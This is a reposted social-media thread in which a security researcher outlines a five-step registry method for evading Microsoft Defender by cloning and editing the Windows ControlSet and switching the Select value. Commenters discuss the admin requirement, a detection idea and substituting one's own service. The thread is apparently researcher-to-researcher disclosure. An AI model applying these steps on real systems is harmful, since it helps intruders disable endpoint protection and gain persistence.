正在加载视频...

视频加载失败

Fancy Defender evasion? Yet another method, nearly bare hands: 1. Export CurrentControlSet to a file 2. Edit path in a file 3. Import a file as new ControlSet 4. Change "Select" values to new one 5. Reboot 6. Enjoy 😎 A side effect of my "Registry internals" session yesterday 😅

74,059 次观看 • 2 年前 •via X (Twitter)

11 条评论

Grzegorz Tworek 的头像
Grzegorz Tworek2 年前

BTW if you think about responsible disclosure, the answer is quite simple: @msftsecresponse closes immediately reports related to Defender if you do not provide "Short explanation on how an attacker could use the information to exploit another user remotely".

imag0r 的头像
imag0r2 年前

You can get around pretty much all AVs this way. Addressing it would be super expensive performance wise. There’s really no good way to stop admins from doing nasty things.

Grzegorz Tworek 的头像
Grzegorz Tworek2 年前

One RegNotifyChangeKeyValue() watching the Select key.

Daniel Mielczarek 的头像
Daniel Mielczarek2 年前

is that method work only on admin account or non-priveleged also?

Grzegorz Tworek 的头像
Grzegorz Tworek2 年前

Admin only, due to two reasons: 1. RegSaveKey() / RegRestoreKey() restrictions, 2. Permissions on HKLM\SYSTEM and HKLM\SYSTEM\Select

Advanced Persistent Dread 的头像
Advanced Persistent Dread2 年前

@UK_Daniel_Card really cool!

Advanced Persistent Dread 的头像
Advanced Persistent Dread2 年前

could we run our own program instead? e.g. nsmpeng.exe ? snd would that have additional benefits?

Grzegorz Tworek 的头像
Grzegorz Tworek2 年前

Sure. You can add your own service after restoring the key. Or just edit paths in the binary file. Whatever is easier for you.

spencer 的头像
spencer2 年前

Lol nice

Br3akp0int 的头像
Br3akp0int2 年前

@Sug4r7 this is awesome! I also have similar research in this persistence topic and I’m planning to release it later this aug.but I might release it soon because of this great research! 😊👍

Grzegorz Tworek 的头像
Grzegorz Tworek2 年前

@Sug4r7 And what about publishing your research in parts? :)

相关视频